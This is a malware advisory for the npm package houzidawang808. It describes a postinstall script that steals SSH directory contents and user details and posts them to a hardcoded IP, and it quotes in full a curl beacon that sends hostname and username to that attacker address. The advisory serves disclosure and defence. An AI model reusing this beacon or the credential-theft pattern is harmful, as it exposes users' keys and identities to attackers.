VDB
KO

MAL-2026-5732

Malicious code in houzidawang808 (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (71d6b96fe99e7f8503cb07df05d6b621dc8e8243fc7288844678d8aff043a654) The package presents itself as a 'simple date formatting utility' (index.js exports a trivial formatDate wrapper around toLocaleDateString), but ships a postinstall.js that runs automatically on npm install. The postinstall script reads the contents of the installer's ~/.ssh directory via fs.readdirSync, collects os.userInfo() username and platform information, and POSTs the data to https://124.221.154.135/post — a hardcoded bare-IP destination with no documented purpose. Chinese-language comments in the file explicitly describe it as SSH-key theft and C2 exfiltration. The package.json additionally declares a build script `curl http://124.221.154.135//pre?h=$(hostname)&u=$(whoami)` that beacons hostname/username over plain HTTP to the same attacker IP, confirming the infrastructure. The benign date-utility facade is a cover story for credential-harvesting on installer machines.

## Source: ghsa-malware (8c38e1b1daa8edf120e924d9ca237c087e9306b47fd3e29f8e610df01b0d46cf) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / houzidawang808
Introduced in: 0

No fixed version published yet for houzidawang808 (npm). Pin to a known-safe version or switch to an alternative.

References